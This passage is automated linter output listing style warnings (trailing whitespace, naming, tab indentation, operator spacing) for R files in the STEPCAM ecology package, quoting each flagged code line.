strippedDbFd(Ord, communities, \n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:180:50:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L180) *style:* **Trailing whitespace is superfluous.**\n```r\n​      FD_output <- strippedDbFd(Ord, communities, \n                                                 ^\n```\n[R/ABC_SMC.R:181:64:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L181) *style:* **Trailing whitespace is superfluous.**\n```r\n​                                m = res[[1]], nb.sp = res[[2]]) \n                                                               ^\n```\n[R/ABC_SMC.R:182:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L182) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/ABC_SMC.R:184:29:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L184) *style:* **Trailing whitespace is superfluous.**\n```r\n​      FRic <- FD_output$FRic \n                            ^\n```\n[R/ABC_SMC.R:186:29:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L186) *style:* **Trailing whitespace is superfluous.**\n```r\n​      FEve <- FD_output$FEve \n                            ^\n```\n[R/ABC_SMC.R:188:29:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L188) *style:* **Trailing whitespace is superfluous.**\n```r\n​      FDiv <- FD_output$FDiv \n                            ^\n```\n[R/ABC_SMC.R:197:69:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L197) *style:* **Trailing whitespace is superfluous.**\n```r\n​      # calculate distance of trait mean between simulated community \n                                                                    ^\n```\n[R/ABC_SMC.R:201:72:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L201) *style:* **Trailing whitespace is superfluous.**\n```r\n​      # (inverse) fit of model: euclidian distance of FD and trait mean \n                                                                       ^\n```\n[R/ABC_SMC.R:203:14:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L203) *style:* **Variable and function names should be all lowercase.**\n```r\n​      fit <- calculateDistance(FRic[[1]], FEve[[1]], FDiv[[1]],\n             ^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:205:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L205) *style:* **Trailing whitespace is superfluous.**\n```r\n​      \n^~~~~~\n```\n[R/ABC_SMC.R:208:19:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L208) *style:* **Variable and function names should be all lowercase.**\n```r\n​        next_disp[numberAccepted] <- params[1]\n                  ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:209:19:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L209) *style:* **Variable and function names should be all lowercase.**\n```r\n​        next_filt[numberAccepted] <- params[2]\n                  ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:210:19:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L210) *style:* **Variable and function names should be all lowercase.**\n```r\n​        next_comp[numberAccepted] <- params[3]\n                  ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:212:14:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L212) *style:* **Variable and function names should be all lowercase.**\n```r\n​        fits[numberAccepted] <- fit\n             ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:213:18:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L213) *style:* **Variable and function names should be all lowercase.**\n```r\n​        rich_vec[numberAccepted] <- FRic[[1]]\n                 ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:214:17:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L214) *style:* **Variable and function names should be all lowercase.**\n```r\n​        eve_vec[numberAccepted] <- FEve[[1]]\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:215:17:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L215) *style:* **Variable and function names should be all lowercase.**\n```r\n​        div_vec[numberAccepted] <- FDiv[[1]]\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:216:17:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L216) *style:* **Variable and function names should be all lowercase.**\n```r\n​        opt_vec[numberAccepted] <- mean_optimum\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:219:24:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L219) *style:* **Variable and function names should be all lowercase.**\n```r\n​          next_weights[numberAccepted] <- 1\n                       ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:221:24:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L221) *style:* **Variable and function names should be all lowercase.**\n```r\n​          next_weights[numberAccepted] <-\n                       ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:222:13:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L222) *style:* **Variable and function names should be all lowercase.**\n```r\n​            calculateWeight(params, changed, sigma, disp_vals, filt_vals,\n            ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:225:9:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L225) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted <- numberAccepted + 1\n        ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:225:27:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L225) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted <- numberAccepted + 1\n                          ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:226:13:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L226) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n            ^\n```\n[R/ABC_SMC.R:226:14:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L226) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n             ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:226:34:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L226) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n                                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:233:21:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L233) *style:* **Put spaces around all infix operators.**\n```r\n​      if (tried > (1/stopRate) && tried > 50)  {\n                   ~^~\n```\n[R/ABC_SMC.R:233:22:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L233) *style:* **Variable and function names should be all lowercase.**\n```r\n​      if (tried > (1/stopRate) && tried > 50)  {\n                     ^~~~~~~~\n```\n[R/ABC_SMC.R:235:13:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L235) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if (numberAccepted / tried < stopRate) {\n            ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:235:38:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L235) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if (numberAccepted / tried < stopRate) {\n                                     ^~~~~~~~\n```\n[R/ABC_SMC.R:255:54:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L255) *style:* **Put spaces around all infix operators.**\n```r\n​    file_name <- paste(\"particles_t=\", t, \".txt\", sep=\"\", collapse = NULL)\n                                                    ~^~\n```\n[R/ABC_SMC.R:258:64:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L258) *style:* **Trailing whitespace is superfluous.**\n```r\n​    cat(\" \", mean(disp_vals), mean(filt_vals), mean(comp_vals), \n                                                               ^\n```\n[R/ABC_SMC.R:259:33:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L259) *style:* **Variable and function names should be all lowercase.**\n```r\n​        \"\\t\", \"accept rate = \", numberAccepted / (tried-1), \"\\n\")\n                                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:259:56:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L259) *style:* **Put spaces around all infix operators.**\n```r\n​        \"\\t\", \"accept rate = \", numberAccepted / (tried-1), \"\\n\")\n                                                      ~^~\n```\n[R/ABC_SMC.R:262:27:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L262) *style:* **Commas should always have a space after.**\n```r\n​    next_weights <- rep(1,numParticles)\n                          ^\n```\n[R/ABC_SMC.R:262:27:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L262) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_weights <- rep(1,numParticles)\n                          ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:263:20:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L263) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_disp <- 1:numParticles\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:264:20:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L264) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_filt <- 1:numParticles\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:265:20:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L265) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_comp <- 1:numParticles\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:275:61:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L275) *style:* **Put spaces around all infix operators.**\n```r\n​    d <- read.table(paste(\"particles_t=\", t - 1, \".txt\", sep=\"\",\n                                                           ~^~\n```\n[R/ABC_SMC.R:279:40:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L279) *style:* **Trailing whitespace is superfluous.**\n```r\n​           \"Can't stop at iteration 1 - \n                                       ^\n```\n[R/ABC_SMC.R:280:57:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/ABC_SMC.R#L280) *style:* **Trailing whitespace is superfluous.**\n```r\n​           please set stop_at_iteration to 2 if you only \n                                                        ^\n```\n[R/generateArtificialData.R:5:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L5) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​generate.Artificial.Data <- function(n_species, n_traits, n_communities,\n^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:6:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L6) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tpool_richness <- n_species\n^\n```\n[R/generateArtificialData.R:8:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n^\n```\n[R/generateArtificialData.R:9:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n^\n```\n[R/generateArtificialData.R:10:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n^\n```\n[R/generateArtificialData.R:10:23:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L10) *style:* **Put spaces around all infix operators.**\n```r\n​\tpool_richness <- n_species\n                     ~^~~\n```\n[R/generateArtificialData.R:12:21:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                   ~^~~\n```\n[R/generateArtificialData.R:12:47:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                             ~^~\n```\n[R/generateArtificialData.R:12:49:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L12) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                                ^\n```\n[R/generateArtificialData.R:12:64:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                                              ~^~\n```\n[R/generateArtificialData.R:13:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:pool_richness) {\n^\n```\n[R/generateArtificialData.R:13:50:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n                                                ~^~\n```\n[R/generateArtificialData.R:13:58:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n                                                        ~^~\n```\n[R/generateArtificialData.R:14:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  column1[i] <- paste(\"species\", i, sep = \"\")\n^\n```\n[R/generateArtificialData.R:14:37:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L14) *style:* **Put spaces around all infix operators.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n                                   ~^~\n```\n[R/generateArtificialData.R:14:54:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L14) *style:* **Put spaces around all infix operators.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n                                                    ~^~\n```\n[R/generateArtificialData.R:15:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:16:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n^\n```\n[R/generateArtificialData.R:17:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:n_traits + 1) {\n^\n```\n[R/generateArtificialData.R:17:12:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L17) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:pool_richness) {\n           ^\n```\n[R/generateArtificialData.R:18:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L18) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n^\n```\n[R/generateArtificialData.R:18:22:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L18) *style:* **Put spaces around all infix operators.**\n```r\n​\t  column1[i] <- paste(\"species\", i, sep = \"\")\n                    ~^~~\n```\n[R/generateArtificialData.R:19:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L19) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:20:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L20) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1[1] <- \"species\"\n^\n```\n[R/generateArtificialData.R:20:14:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L20) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n            ~^~~\n```\n[R/generateArtificialData.R:20:25:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L20) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n                        ^\n```\n[R/generateArtificialData.R:21:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L21) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcolumns <- matrix( cbind( column1, traits_pool), ncol = (n_traits + 1))\n^\n```\n[R/generateArtificialData.R:21:12:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L21) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:n_traits + 1) {\n           ^\n```\n[R/generateArtificialData.R:22:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L22) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool_df <- as.data.frame(columns)\n^\n```\n[R/generateArtificialData.R:22:19:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L22) *style:* **Put spaces around all infix operators.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                 ~^~~\n```\n[R/generateArtificialData.R:22:37:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L22) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                                    ^\n```\n[R/generateArtificialData.R:22:40:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L22) *style:* **Put spaces around all infix operators.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                                      ~^~\n```\n[R/generateArtificialData.R:23:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L23) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(traits_pool_df) <- row1\n^\n```\n[R/generateArtificialData.R:24:17:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1[1] <- \"species\"\n               ~^~~\n```\n[R/generateArtificialData.R:25:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L25) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n^\n```\n[R/generateArtificialData.R:25:17:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L25) *style:* **Put spaces around all infix operators.**\n```r\n​\tcolumns <- matrix( cbind( column1, traits_pool), ncol = (n_traits + 1))\n               ~^~~\n```\n[R/generateArtificialData.R:25:63:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L25) *style:* **Put spaces around all infix operators.**\n```r\n​\tcolumns <- matrix( cbind( column1, traits_pool), ncol = (n_traits + 1))\n                                                             ~^~\n```\n[R/generateArtificialData.R:25:65:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L25) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tcolumns <- matrix( cbind( column1, traits_pool), ncol = (n_traits + 1))\n                                                                ^\n```\n[R/generateArtificialData.R:26:24:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L26) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool_df <- as.data.frame(columns)\n                      ~^~~\n```\n[R/generateArtificialData.R:27:31:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L27) *style:* **Put spaces around all infix operators.**\n```r\n​\tnames(traits_pool_df) <- row1\n                             ~^~~\n```\n[R/generateArtificialData.R:28:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L28) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\toccurence <- 10 ^ rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n^\n```\n[R/generateArtificialData.R:29:26:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L29) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                        ~^~~\n```\n[R/generateArtificialData.R:29:43:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L29) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                                          ^\n```\n[R/generateArtificialData.R:29:58:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L29) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                                                        ~^~\n```\n[R/generateArtificialData.R:30:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L30) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * \n^\n```\n[R/generateArtificialData.R:31:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L31) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                            (sd_richness * pool_richness) +\n^\n```\n[R/generateArtificialData.R:32:19:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10 ^ rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                 ~^~~\n```\n[R/generateArtificialData.R:32:25:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10 ^ rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                       ~^~\n```\n[R/generateArtificialData.R:32:53:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10 ^ rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                                                   ~^~\n```\n[R/generateArtificialData.R:32:61:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10 ^ rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                                                           ~^~\n```\n[R/generateArtificialData.R:33:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L33) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n^\n```\n[R/generateArtificialData.R:34:1:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L34) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values[which(richness_values < 0)] <- 0\n^\n```\n[R/generateArtificialData.R:34:25:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L34) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * \n                       ~^~~\n```\n[R/generateArtificialData.R:34:34:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L34) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * \n                                 ^\n```\n[R/generateArtificialData.R:34:61:](https://github.com/thijsjanzen/STEPCAM/blob/eeb09f62aadd8d835a16cf18c8775d4bed3fa5d5/R/generateArtificialData.R#L34) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean 